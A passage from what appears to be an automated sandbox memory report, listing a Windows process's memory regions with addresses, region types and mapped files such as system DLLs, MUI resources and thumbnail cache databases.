end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 332 start_va = 0x1e00000 end_va = 0x1e08fff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 333 start_va = 0x1e10000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 334 start_va = 0x1e50000 end_va = 0x1e57fff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 335 start_va = 0x1e60000 end_va = 0x1f07fff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 336 start_va = 0x1f10000 end_va = 0x1fc3fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 337 start_va = 0x1fd0000 end_va = 0x1fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 338 start_va = 0x1fe0000 end_va = 0x1fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 339 start_va = 0x1ff0000 end_va = 0x200cfff entry_point = 0x1ff0000 region_type = mapped_file name = "{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" Region: id = 340 start_va = 0x2010000 end_va = 0x2010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002010000" filename = "" Region: id = 341 start_va = 0x2020000 end_va = 0x2023fff entry_point = 0x2020000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 342 start_va = 0x2030000 end_va = 0x205ffff entry_point = 0x2030000 region_type = mapped_file name = "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" Region: id = 343 start_va = 0x2060000 end_va = 0x2063fff entry_point = 0x2060000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 344 start_va = 0x2070000 end_va = 0x2071fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 345 start_va = 0x2080000 end_va = 0x20bffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 346 start_va = 0x20c0000 end_va = 0x20c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 347 start_va = 0x20d0000 end_va = 0x20d3fff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 348 start_va = 0x20e0000 end_va = 0x20e0fff entry_point = 0x20e0000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" Region: id = 349 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x20f0000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" Region: id = 350 start_va = 0x2100000 end_va = 0x2101fff entry_point = 0x2100000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" Region: id = 351 start_va = 0x2110000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 352 start_va = 0x2310000 end_va = 0x2375fff entry_point = 0x2310000 region_type = mapped_file name = "{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" Region: id = 353 start_va = 0x2380000 end_va = 0x2380fff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 354 start_va = 0x2390000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 355 start_va = 0x23d0000 end_va = 0x23d3fff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 356 start_va = 0x23e0000 end_va = 0x23e3fff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 357 start_va = 0x23f0000 end_va = 0x23f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 358 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 359 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 360 start_va = 0x2420000 end_va = 0x2420fff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 361 start_va = 0x2430000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 362 start_va = 0x2470000 end_va = 0x2470fff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 363 start_va = 0x2480000 end_va = 0x2480fff entry_point = 0x2480000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" Region: id = 364 start_va = 0x2490000 end_va = 0x2490fff entry_point = 0x2490000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" Region: id = 365 start_va = 0x24a0000 end_va = 0x24a1fff entry_point = 0x24a0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" Region: id = 366 start_va = 0x24b0000 end_va = 0x24b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 367 start_va = 0x24c0000 end_va = 0x24c0fff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 368 start_va = 0x24d0000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 369 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002510000" filename = "" Region: id = 370 start_va = 0x2520000 end_va = 0x2521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002520000" filename = "" Region: id = 371 start_va = 0x2530000 end_va = 0x2533fff entry_point = 0x2530000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 372 start_va = 0x2540000 end_va = 0x2541fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 373 start_va = 0x2550000 end_va = 0x2550fff entry_point = 0x2550000 region_type = mapped_file name = "{7CD55808-3D38-4DD5-90C9-62F0E6EE60D4}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{7CD55808-3D38-4DD5-90C9-62F0E6EE60D4}.2.ver0x0000000000000001.db" Region: id = 374 start_va = 0x2560000 end_va = 0x2560fff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 375 start_va = 0x2570000 end_va = 0x2570fff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 376 start_va = 0x2580000 end_va = 0x2580fff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 377 start_va = 0x2590000 end_va = 0x2590fff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 378 start_va = 0x25a0000 end_va = 0x25a0fff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 379 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 380 start_va = 0x25c0000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 381 start_va = 0x2600000 end_va = 0x2f2ffff entry_point = 0x2600000 region_type = mapped_file name = "StaticCache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" Region: id = 382 start_va = 0x2f30000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 383 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 384 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 385 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 386 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 387 start_va = 0x3070000 end_va = 0x30affff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 388 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x30b0000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" Region: id = 389 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x30c0000 region_type = mapped_file name = "MMDevAPI.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" Region: id = 390 start_va = 0x30d0000 end_va = 0x30d1fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 391 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x30e0000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" Region: id = 392 start_va = 0x30f0000 end_va = 0x312ffff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 393 start_va = 0x3130000 end_va = 0x316ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 394 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x3170000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" Region: id = 395 start_va = 0x3180000 end_va = 0x3181fff entry_point = 0x3180000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" Region: id = 396 start_va = 0x3190000 end_va = 0x3191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003190000" filename = "" Region: id = 397 start_va = 0x31a0000 end_va = 0x31dffff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 398 start_va = 0x31e0000 end_va = 0x321ffff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 399 start_va = 0x3220000 end_va = 0x3221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003220000" filename = "" Region: id = 400 start_va = 0x3230000 end_va = 0x3233fff entry_point = 0x3230000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 401 start_va = 0x3240000 end_va = 0x3240fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 402 start_va = 0x3250000 end_va = 0x3250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003250000" filename = "" Region: id = 403 start_va = 0x3260000 end_va = 0x3260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003260000" filename = "" Region: id = 404 start_va = 0x3270000 end_va = 0x3270fff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 405 start_va = 0x3280000 end_va = 0x3280fff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 406 start_va = 0x3290000 end_va = 0x3292fff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 407 start_va = 0x32a0000 end_va = 0x32a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 408 start_va = 0x32b0000 end_va = 0x32f7fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 409 start_va = 0x3300000 end_va = 0x3332fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 410 start_va = 0x3340000 end_va = 0x3341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003340000" filename = "" Region: id = 411 start_va = 0x3350000 end_va = 0x3351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003350000" filename = "" Region: id = 412 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x3360000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" Region: id = 413 start_va = 0x3370000 end_va = 0x3370fff entry_point = 0x3370000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" Region: id = 414 start_va = 0x3380000 end_va = 0x3381fff entry_point = 0x3380000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" Region: id = 415 start_va = 0x3390000 end_va = 0x3391fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003390000" filename = "" Region: id = 416 start_va = 0x33a0000 end_va = 0x33dffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 417 start_va = 0x33e0000 end_va = 0x341ffff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 418 start_va = 0x3420000 end_va = 0x351ffff entry_point = 0x3420000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" Region: id = 419 start_va = 0x3520000 end_va = 0x356ffff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 420 start_va = 0x3570000 end_va = 0x3570fff entry_point = 0x3570000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" Region: id = 421 start_va = 0x3580000 end_va = 0x367ffff entry_point = 0x3580000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" Region: id = 422 start_va = 0x3680000 end_va = 0x377ffff entry_point = 0x3680000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 423 start_va = 0x3780000 end_va = 0x3781fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003780000" filename = "" Region: id = 424 start_va = 0x3790000 end_va = 0x37cffff entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 425 start_va = 0x37d0000 end_va = 0x37d6fff entry_point = 0x37d0000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" Region: id = 426 start_va = 0x37e0000 end_va = 0x37e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037e0000" filename = "" Region: id = 427 start_va = 0x37f0000 end_va = 0x382ffff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 428 start_va = 0x3830000 end_va = 0x4b84fff entry_point = 0x3830000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" Region: id = 429 start_va = 0x4b90000 end_va = 0x4f91fff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 430 start_va = 0x4fa0000 end_va = 0x4fa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fa0000" filename = "" Region: id = 431 start_va = 0x4fb0000 end_va = 0x4fb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fb0000" filename = "" Region: id = 432 start_va = 0x4fc0000 end_va = 0x4fc3fff entry_point = 0x4fc0000 region_type = mapped_file name = "prnfldr.dll.mui" filename = "\\Windows\\System32\\en-US\\prnfldr.dll.mui" Region: id = 433 start_va = 0x4fd0000 end_va = 0x4fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 434 start_va = 0x5020000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 435 start_va = 0x5060000 end_va = 0x515ffff entry_point = 0x5060000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" Region: id = 436 start_va = 0x5160000 end_va = 0x525ffff entry_point = 0x5160000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" Region: id = 437 start_va = 0x5260000 end_va = 0x535ffff entry_point = 0x5260000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 438 start_va = 0x5360000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 439 start_va = 0x53a0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 440 start_va = 0x5410000 end_va = 0x544ffff entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 441 start_va = 0x5450000 end_va = 0x564ffff entry_point = 0x0 region_type = private name = "private_0x0000000005450000" filename = "" Region: id = 442 start_va = 0x5650000 end_va = 0x568ffff entry_point = 0x0 region_type = private name = "private_0x0000000005650000" filename = "" Region: id = 443 start_va = 0x56d0000 end_va = 0x570ffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 444 start_va = 0x5710000 end_va = 0x57bffff entry_point = 0x5710000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 445 start_va = 0x57c0000 end_va = 0x58bffff entry_point = 0x57c0000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" Region: id = 446 start_va = 0x58c0000 end_va = 0x59bffff entry_point = 0x58c0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" Region: id = 447 start_va = 0x59c0000 end_va = 0x5abffff entry_point = 0x59c0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 448 start_va = 0x5ac0000 end_va = 0x5b6ffff entry_point = 0x5ac0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 449 start_va = 0x5b70000 end_va = 0x5c6ffff entry_point = 0x5b70000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" Region: id = 450 start_va = 0x5c70000 end_va = 0x5d6ffff entry_point = 0x5c70000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" Region: id = 451 start_va = 0x5d70000 end_va = 0x5e6ffff entry_point = 0x5d70000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 452 start_va = 0x5e70000 end_va = 0x5eaffff entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 453 start_va = 0x5ed0000 end_va = 0x5f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ed0000" filename = "" Region: id = 454 start_va = 0x5f30000 end_va = 0x5f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f30000" filename = "" Region: id = 455 start_va = 0x5fb0000 end_va = 0x5feffff entry_point = 0x0 region_type = private name = "private_0x0000000005fb0000" filename = "" Region: id = 456 start_va = 0x5ff0000 end_va = 0x602ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ff0000" filename = "" Region: id = 457 start_va = 0x60a0000 end_va = 0x60dffff entry_point = 0x0 region_type = private name = "private_0x00000000060a0000" filename = "" Region: id = 458 start_va = 0x6100000 end_va = 0x613ffff entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 459 start_va = 0x6190000 end_va = 0x61cffff entry_point = 0x0 region_type = private name = "private_0x0000000006190000" filename = "" Region: id = 460 start_va = 0x61f0000 end_va = 0x622ffff entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 461 start_va = 0x62a0000 end_va = 0x62affff entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 462 start_va = 0x62b0000 end_va = 0x636ffff entry_point = 0x62b0000 region_type = mapped_file name = "KernelBase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" Region: id = 463 start_va = 0x6370000 end_va = 0x63affff entry_point = 0x0 region_type = private name = "private_0x0000000006370000" filename = "" Region: id = 464 start_va = 0x6410000 end_va = 0x641ffff entry_point = 0x0 region_type = private name = "private_0x0000000006410000" filename = "" Region: id = 465 start_va = 0x6450000 end_va = 0x648ffff entry_point = 0x0 region_type = private name = "private_0x0000000006450000" filename = "" Region: id = 466 start_va = 0x64c0000 end_va = 0x64fffff entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 467 start_va = 0x6550000 end_va = 0x658ffff entry_point = 0x0 region_type = private name = "private_0x0000000006550000" filename = "" Region: id = 468 start_va = 0x65b0000 end_va = 0x65bffff entry_point = 0x0 region_type = private name = "private_0x00000000065b0000" filename = "" Region: id = 469 start_va = 0x65c0000 end_va = 0x666ffff entry_point = 0x65c0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 470 start_va = 0x6730000 end_va = 0x676ffff entry_point = 0x0 region_type = private name = "private_0x0000000006730000" filename = "" Region: id = 471 start_va = 0x6e120000 end_va = 0x6e202fff entry_point = 0x6e120000 region_type = mapped_file name = "FXSRESM.dll" filename = "\\Windows\\System32\\FXSRESM.dll" Region: id = 472 start_va = 0x6e210000 end_va = 0x6e249fff entry_point = 0x6e212a29 region_type = mapped_file name = "FXSAPI.dll" filename = "\\Windows\\System32\\FXSAPI.dll" Region: id = 473 start_va = 0x6e250000 end_va = 0x6e321fff entry_point = 0x6e25162e region_type = mapped_file name = "FXSST.dll" filename = "\\Windows\\System32\\FXSST.dll" Region: id = 474 start_va = 0x6e330000 end_va = 0x6e35afff entry_point = 0x6e3480db region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" Region: id = 475 start_va = 0x6e360000 end_va = 0x6e3c3fff entry_point = 0x6e3613b0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" Region: id = 476 start_va = 0x6e3d0000 end_va = 0x6e489fff entry_point = 0x6e3e2584 region_type = mapped_file name = "ActionCenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" Region: id = 477 start_va = 0x6e490000 end_va = 0x6e69dfff entry_point = 0x6e4921fe region_type = mapped_file name = "SyncCenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" Region: id = 478 start_va = 0x6e6a0000 end_va = 0x6f11ffff entry_point = 0x6e6a6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" Region: id = 479 start_va = 0x6f120000 end_va = 0x6f1cffff entry_point = 0x6f13bbb6 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" Region: id = 480 start_va = 0x6f1f0000 end_va = 0x6f23cfff entry_point = 0x6f1f3151 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" Region: id = 481 start_va = 0x6f240000 end_va = 0x6f264fff entry_point = 0x6f2477be region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" Region: id = 482 start_va = 0x6f290000 end_va = 0x6f2bdfff entry_point = 0x6f29bcbf region_type = mapped_file name = "QAGENT.DLL" filename = "\\Windows\\System32\\QAGENT.DLL" Region: id = 483 start_va = 0x6f2c0000 end_va = 0x6f307fff entry_point = 0x6f2c53a7 region_type = mapped_file name = "WWanAPI.dll" filename = "\\Windows\\System32\\WWanAPI.dll" Region: id = 484 start_va = 0x6f310000 end_va = 0x6f325fff entry_point = 0x6f311240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 485 start_va = 0x6f330000 end_va = 0x6f339fff entry_point = 0x6f334c23 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" Region: id = 486 start_va = 0x6f340000 end_va = 0x6f345fff entry_point = 0x6f341a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 487 start_va = 0x6f520000 end_va = 0x6f536fff entry_point = 0x6f524ba3 region_type = mapped_file name = "QUTIL.DLL" filename = "\\Windows\\System32\\QUTIL.DLL" Region: id = 488 start_va = 0x6f540000 end_va = 0x6f6edfff entry_point = 0x6f5415a7 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" Region: id = 489 start_va = 0x6f6f0000 end_va = 0x6f71afff entry_point = 0x6f6f171f region_type = mapped_file name = "PortableDeviceTypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" Region: id = 490 start_va = 0x6f720000 end_va = 0x6f73cfff entry_point = 0x6f731864 region_type = mapped_file name = "WPDShServiceObj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" Region: id = 491 start_va = 0x6f740000 end_va = 0x6f9a4fff entry_point = 0x6f74baff region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" Region: id = 492 start_va = 0x6f9c0000 end_va = 0x6f9c7fff entry_point = 0x6f9c1220 region_type = mapped_file name = "ehSSO.dll" filename = "\\Windows\\ehome\\ehSSO.dll" Region: id = 493 start_va = 0x6f9d0000 end_va = 0x6f9ddfff entry_point = 0x6f9d1336 region_type = mapped_file name = "AltTab.dll" filename = "\\Windows\\System32\\AltTab.dll" Region: id = 494 start_va = 0x6f9e0000 end_va = 0x6f9fafff entry_point = 0x6f9e6d66 region_type = mapped_file name = "UIAnimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" Region: id = 495 start_va = 0x6fa00000 end_va = 0x6fa0ffff entry_point = 0x6fa039b3 region_type = mapped_file name = "Syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" Region: id = 496 start_va = 0x6fa10000 end_va = 0x6fa73fff entry_point = 0x6fa380f6 region_type = mapped_file name = "DXP.dll" filename = "\\Windows\\System32\\DXP.dll" Region: id = 497 start_va = 0x6fae0000 end_va = 0x6fb68fff entry_point = 0x6fae55c7 region_type = mapped_file name = "PortableDeviceApi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" Region: id = 498 start_va = 0x6fba0000 end_va = 0x6fbf0fff entry_point = 0x6fbc988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" Region: id = 499 start_va = 0x6fc00000 end_va = 0x6fc63fff entry_point = 0x6fc1e4c7 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" Region: id = 500 start_va = 0x6fc70000 end_va = 0x6fd26fff entry_point = 0x6fc71730 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" Region: id = 501 start_va = 0x6fd30000 end_va = 0x6fd69fff entry_point = 0x6fd334b9 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" Region: id = 502 start_va = 0x6fe90000 end_va = 0x6ff23fff entry_point = 0x6fe9d53d region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" Region: id = 503 start_va = 0x70690000 end_va = 0x706e9fff entry_point = 0x70691f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" Region: id = 504 start_va = 0x70da0000 end_va = 0x70da6fff entry_point = 0x70da11d0 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" Region: id = 505 start_va = 0x70db0000 end_va = 0x70dc3fff entry_point = 0x70db1340 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" Region: id = 506 